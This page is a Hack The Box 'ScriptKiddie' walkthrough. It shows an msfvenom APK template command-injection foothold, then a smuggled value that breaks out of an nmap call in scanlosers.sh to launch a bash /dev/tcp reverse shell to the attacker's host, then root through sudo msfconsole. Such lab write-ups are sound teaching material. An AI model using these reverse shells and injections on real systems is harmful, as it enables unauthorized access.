
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
        <meta name="author" content="triki">
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.2.3, mkdocs-material-8.0.5">
    
    
      
        <title>2021 03 22 scriptkiddie - ikirt.github.io</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.a617204b.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.9204c3b2.min.css">
        
      
    
    
    
      
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,400i,700%7CRoboto+Mono&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../..",location),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="" data-md-color-accent="">
  
    
    
      <script>var palette=__md_get("__palette");if(palette&&"object"==typeof palette.color)for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)</script>
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../.." title="ikirt.github.io" class="md-header__button md-logo" aria-label="ikirt.github.io" data-md-component="logo">
      
  <img src="../../logo.jpg" alt="logo">

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            ikirt.github.io
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              2021 03 22 scriptkiddie
            
          </span>
        </div>
      </div>
    </div>
    
      <form class="md-header__option" data-md-component="palette">
        
          
          
          <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="" data-md-color-accent=""  aria-label="Switch to light mode"  type="radio" name="__palette" id="__palette_1">
          
            <label class="md-header__button md-icon" title="Switch to light mode" for="__palette_2" hidden>
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 7H7a5 5 0 0 0-5 5 5 5 0 0 0 5 5h10a5 5 0 0 0 5-5 5 5 0 0 0-5-5m0 8a3 3 0 0 1-3-3 3 3 0 0 1 3-3 3 3 0 0 1 3 3 3 3 0 0 1-3 3z"/></svg>
            </label>
          
        
          
          
          <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="" data-md-color-accent=""  aria-label="Switch to dark mode"  type="radio" name="__palette" id="__palette_2">
          
            <label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 6H7c-3.31 0-6 2.69-6 6s2.69 6 6 6h10c3.31 0 6-2.69 6-6s-2.69-6-6-6zm0 10H7c-2.21 0-4-1.79-4-4s1.79-4 4-4h10c2.21 0 4 1.79 4 4s-1.79 4-4 4zM7 9c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3z"/></svg>
            </label>
          
        
      </form>
    
    
    
      <label class="md-header__button md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" aria-label="Clear" tabindex="-1">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="ikirt.github.io" class="md-nav__button md-logo" aria-label="ikirt.github.io" data-md-component="logo">
      
  <img src="../../logo.jpg" alt="logo">

    </a>
    ikirt.github.io
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        About
      </a>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_2" type="checkbox" id="__nav_2" >
      
      
      
      
        <label class="md-nav__link" for="__nav_2">
          3D
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="3D" data-md-level="1">
        <label class="md-nav__title" for="__nav_2">
          <span class="md-nav__icon md-icon"></span>
          3D
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/2021-04-06-my-haribo/" class="md-nav__link">
        3D printing
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/TMC5160/" class="md-nav__link">
        TMC5160
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/mks-genv14/" class="md-nav__link">
        MKS Gen v1.4
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/skrv14/" class="md-nav__link">
        SKR v1.4 Turbo
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/tmc2209/" class="md-nav__link">
        TMC2209
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_3" type="checkbox" id="__nav_3" >
      
      
      
      
        <label class="md-nav__link" for="__nav_3">
          Hackerone
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Hackerone" data-md-level="1">
        <label class="md-nav__title" for="__nav_3">
          <span class="md-nav__icon md-icon"></span>
          Hackerone
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../hackerone/2020-04-08-petshop-pro/" class="md-nav__link">
        PetShop Pro Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../hackerone/2020-04-08-thermostat/" class="md-nav__link">
        H1 Thermostat Write-up
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
    
  
  
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4" type="checkbox" id="__nav_4" checked>
      
      
      
      
        <label class="md-nav__link" for="__nav_4">
          Htb
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Htb" data-md-level="1">
        <label class="md-nav__title" for="__nav_4">
          <span class="md-nav__icon md-icon"></span>
          Htb
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2019-10-20-postman/" class="md-nav__link">
        2019 10 20 postman
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2019-11-10-traverxec/" class="md-nav__link">
        2019 11 10 traverxec
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-03-18-traceback/" class="md-nav__link">
        2020 03 18 traceback
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-06-16-htb-oh-my-zsh-theme/" class="md-nav__link">
        2020 06 16 htb oh my zsh theme
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-07-12-blunder/" class="md-nav__link">
        2020 07 12 blunder
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-07-16-tabby/" class="md-nav__link">
        2020 07 16 tabby
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-07-19-admirer/" class="md-nav__link">
        2020 07 19 admirer
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-08-05-buff/" class="md-nav__link">
        2020 08 05 buff
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-09-10-doctor/" class="md-nav__link">
        2020 09 10 doctor
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-09-20-omni/" class="md-nav__link">
        2020 09 20 omni
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-12-16-academy/" class="md-nav__link">
        2020 12 16 academy
      </a>
    </li>
  

            
          
            
              
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" data-md-toggle="toc" type="checkbox" id="__toc">
      
      
      
      <a href="./" class="md-nav__link md-nav__link--active">
        2021 03 22 scriptkiddie
      </a>
      
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2021-05-07-spectra/" class="md-nav__link">
        2021 05 07 spectra
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_5" type="checkbox" id="__nav_5" >
      
      
      
      
        <label class="md-nav__link" for="__nav_5">
          Mc
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Mc" data-md-level="1">
        <label class="md-nav__title" for="__nav_5">
          <span class="md-nav__icon md-icon"></span>
          Mc
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../mc/2020-04-19-esp32-presence-ha/" class="md-nav__link">
        ESP32 BLE Room Presence with HomeAssistant
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
          
          <div class="md-content" data-md-component="content">
            <article class="md-content__inner md-typeset">
              
                

  <h1>2021 03 22 scriptkiddie</h1>

<p><img alt="ScriptKiddie" src="/images/scriptkiddie/scriptkiddie-logo.png" /></p>
<p>Starting off with <strong>nmap</strong></p>
<div class="highlight"><pre><span></span><code>PORT     STATE SERVICE REASON         VERSION
<span class="m">22</span>/tcp   open  ssh     syn-ack ttl <span class="m">63</span> OpenSSH <span class="m">8</span>.2p1 Ubuntu 4ubuntu0.1 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol <span class="m">2</span>.0<span class="o">)</span>
<span class="p">|</span> ssh-hostkey: 
<span class="p">|</span>   <span class="m">3072</span> 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c <span class="o">(</span>RSA<span class="o">)</span>
<span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/YB1g/YHwZNvTzj8lysM+SzX6dZzRbfF24y3ywkhai4pViGEwUklIPkEvuLSGH97NJ4y8r9uUXzyoq3iuVJ/vGXiFlPCrg+QDp7UnwANBmDqbVLucKdor+JkWHJJ1h3ftpEHgol54tj+6J7ftmaOR29Iwg+FKtcyNG6PY434cfA0Pwshw6kKgFa+HWljNl+41H3WVua4QItPmrh+CrSoaA5kCe0FAP3c2uHcv2JyDjgCQxmN1GoLtlAsEznHlHI1wycNZGcHDnqxEmovPTN4qisOKEbYfy2mu1Eqq3Phv8UfybV8c60wUqGtClj3YOO1apDZKEe8eZZqy5eXU8mIO+uXcp5zxJ/Wrgng7WTguXGzQJiBHSFq52fHFvIYSuJOYEusLWkGhiyvITYLWZgnNL+qAVxZtP80ZTq+lm4cJHJZKl0OYsmqO0LjlMOMTPFyA+W2IOgAmnM+miSmSZ6n6pnSA+LE2Pj01egIhHw5+duAYxUHYOnKLVak1WWk/C68<span class="o">=</span>
<span class="p">|</span>   <span class="m">256</span> b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec <span class="o">(</span>ECDSA<span class="o">)</span>
<span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJA31QhiIbYQMUwn/n3+qcrLiiJpYIia8HdgtwkI8JkCDm2n+j6dB3u5I17IOPXE7n5iPiW9tPF3Nb0aXmVJmlo<span class="o">=</span>
<span class="p">|</span>   <span class="m">256</span> 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 <span class="o">(</span>ED25519<span class="o">)</span>
<span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOWjCdxetuUPIPnEGrowvR7qRAR7nuhUbfFraZFmbIr4
<span class="m">5000</span>/tcp open  http    syn-ack ttl <span class="m">63</span> Werkzeug httpd <span class="m">0</span>.16.1 <span class="o">(</span>Python <span class="m">3</span>.8.5<span class="o">)</span>
<span class="p">|</span> http-methods: 
<span class="p">|</span>_  Supported Methods: POST HEAD GET OPTIONS
<span class="p">|</span>_http-title: k1d<span class="err">&#39;</span><span class="m">5</span> h4ck3r t00l5
Aggressive OS guesses: Linux <span class="m">4</span>.15 - <span class="m">5</span>.6 <span class="o">(</span><span class="m">95</span>%<span class="o">)</span>, Linux <span class="m">5</span>.3 - <span class="m">5</span>.4 <span class="o">(</span><span class="m">95</span>%<span class="o">)</span>, Linux <span class="m">2</span>.6.32 <span class="o">(</span><span class="m">95</span>%<span class="o">)</span>, Linux <span class="m">5</span>.0 - <span class="m">5</span>.3 <span class="o">(</span><span class="m">95</span>%<span class="o">)</span>, Linux <span class="m">3</span>.1 <span class="o">(</span><span class="m">95</span>%<span class="o">)</span>, Linux <span class="m">3</span>.2 <span class="o">(</span><span class="m">95</span>%<span class="o">)</span>, AXIS 210A or <span class="m">211</span> Network Camera <span class="o">(</span>Linux <span class="m">2</span>.6.17<span class="o">)</span> <span class="o">(</span><span class="m">94</span>%<span class="o">)</span>, ASUS RT-N56U WAP <span class="o">(</span>Linux <span class="m">3</span>.4<span class="o">)</span> <span class="o">(</span><span class="m">93</span>%<span class="o">)</span>, Linux <span class="m">3</span>.16 <span class="o">(</span><span class="m">93</span>%<span class="o">)</span>, Linux <span class="m">5</span>.0 <span class="o">(</span><span class="m">93</span>%<span class="o">)</span>
</code></pre></div>
<p>Right now SSH is useless without username and password so I will focus on port 5000, browing so it I see a scriptkiddie tool</p>
<p><img alt="ScriptKiddie" src="/images/scriptkiddie/scriptkiddie-port-5000.png" /></p>
<p>This runs msfvenom in the backround for generate the payloads, googling for this I found there is a vulnerability with it and Android APK's which is an option on this page. https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/</p>
<p>Using metasploit <strong>unix/fileformat/metasploit_msfvenom_apk_template_cmd_inection</strong></p>
<p><img alt="ScriptKiddie" src="/images/scriptkiddie/scriptkiddie-foothold-1.png" /></p>
<p>Now I need to setup a listener locally and upload the APK to the site. Select Android, put in the IP address and add the msf.apk and click submit.</p>
<p><img alt="ScriptKiddie" src="/images/scriptkiddie/scriptkiddie-foothold-2.png" /></p>
<p>logged in as <strong>kid</strong> nothing useful in this home folder,</p>
<p>Did find a script in /home/pwn
<div class="highlight"><pre><span></span><code>kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh

<span class="c1">#!/bin/bash</span>

<span class="nv">log</span><span class="o">=</span>/home/kid/logs/hackers

<span class="nb">cd</span> /home/pwn/
cat <span class="nv">$log</span> <span class="p">|</span> cut -d<span class="s1">&#39; &#39;</span> -f3- <span class="p">|</span> sort -u <span class="p">|</span> <span class="k">while</span> <span class="nb">read</span> ip<span class="p">;</span> <span class="k">do</span>
    sh -c <span class="s2">&quot;nmap --top-ports 10 -oN recon/</span><span class="si">${</span><span class="nv">ip</span><span class="si">}</span><span class="s2">.nmap </span><span class="si">${</span><span class="nv">ip</span><span class="si">}</span><span class="s2"> 2&gt;&amp;1 &gt;/dev/null&quot;</span> <span class="p">&amp;</span>
<span class="k">done</span>

<span class="k">if</span> <span class="o">[[</span> <span class="k">$(</span>wc -l &lt; <span class="nv">$log</span><span class="k">)</span> -gt <span class="m">0</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then</span> <span class="nb">echo</span> -n &gt; <span class="nv">$log</span><span class="p">;</span> <span class="k">fi</span>
</code></pre></div></p>
<p>This might be used to get to user pwn, this cats a file hackers which just happens to be owned by my current user <strong>kid</strong></p>
<div class="highlight"><pre><span></span><code>kid@scriptkiddie:/home/pwn$ ls -l /home/kid/logs/hackers
ls -l /home/kid/logs/hackers
-rw-rw-r-- <span class="m">1</span> kid pwn <span class="m">0</span> Feb  <span class="m">3</span> <span class="m">11</span>:46 /home/kid/logs/hackers
</code></pre></div>
<p>echo "    ;/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/10.10.14.12/4447 0&gt;&amp;1'     #" &gt;&gt; hackers</p>
<p>what the command does is end the nmap command 
<div class="highlight"><pre><span></span><code>nmap --top-ports <span class="m">10</span> -oN recon/<span class="si">${</span><span class="nv">ip</span><span class="si">}</span>.nmap <span class="si">${</span><span class="nv">ip</span><span class="si">}</span>  <span class="p">;</span> /bin/bash -c <span class="s1">&#39;bash -i &gt;&amp; /dev/tcp/10.10.14.12/4447 0&gt;&amp;1&#39;</span>     <span class="c1">#&quot; &gt;&gt; hackers</span>
</code></pre></div></p>
<p>so nmap doesn't scan anything but execute the reverse shell.</p>
<p>this gets me a shell as pwn</p>
<p>running sudo -l I see I can run msf console as root
<div class="highlight"><pre><span></span><code>pwn@scriptkiddie:/dev/shm$ sudo -l
Matching Defaults entries <span class="k">for</span> pwn on scriptkiddie:
env_reset,mail_badpass,
<span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin
User pwn may run the following commands on
scriptkiddie:
<span class="o">(</span>root<span class="o">)</span> NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole     
</code></pre></div></p>
<p>While in msfconsole we can run shell commands.
<div class="highlight"><pre><span></span><code>msf6 &gt; whoami
<span class="o">[</span>*<span class="o">]</span> exec: 
whoami
root                         

msf6 &gt; <span class="nb">cd</span> /root
msf6 &gt;                                                                         
msf6 &gt; <span class="nb">pwd</span>                                                                     
<span class="o">[</span>*<span class="o">]</span> exec: <span class="nb">pwd</span>                                                                  

/root                                                                          
msf6 &gt; dir                                                                     
<span class="o">[</span>*<span class="o">]</span> exec: dir                                                                  

root.txt  snap                                
</code></pre></div></p>
<p>Rooted. I could add my RSA key to the root authorized hosts and do more, but the flag is found, so I'm done.</p>

  <hr>
<div class="md-source-file">
  <small>
    
      Last update:
      <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">December 22, 2021</span>
      
    
  </small>
</div>

              
            </article>
          </div>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
    <nav class="md-footer__inner md-grid" aria-label="Footer">
      
        
        <a href="../2020-12-16-academy/" class="md-footer__link md-footer__link--prev" aria-label="Previous: 2020 12 16 academy" rel="prev">
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
          </div>
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                Previous
              </span>
              2020 12 16 academy
            </div>
          </div>
        </a>
      
      
        
        <a href="../2021-05-07-spectra/" class="md-footer__link md-footer__link--next" aria-label="Next: 2021 05 07 spectra" rel="next">
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                Next
              </span>
              2021 05 07 spectra
            </div>
          </div>
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11H4z"/></svg>
          </div>
        </a>
      
    </nav>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    <script id="__config" type="application/json">{"base": "../..", "features": ["content.code.annotate"], "translations": {"clipboard.copy": "Copy to clipboard", "clipboard.copied": "Copied to clipboard", "search.config.lang": "en", "search.config.pipeline": "trimmer, stopWordFilter", "search.config.separator": "[\\s\\-]+", "search.placeholder": "Search", "search.result.placeholder": "Type to start searching", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.term.missing": "Missing", "select.version.title": "Select version"}, "search": "../../assets/javascripts/workers/search.cefbb252.min.js"}</script>
    
    
      <script src="../../assets/javascripts/bundle.a5f8ea78.min.js"></script>
      
    
  </body>
</html>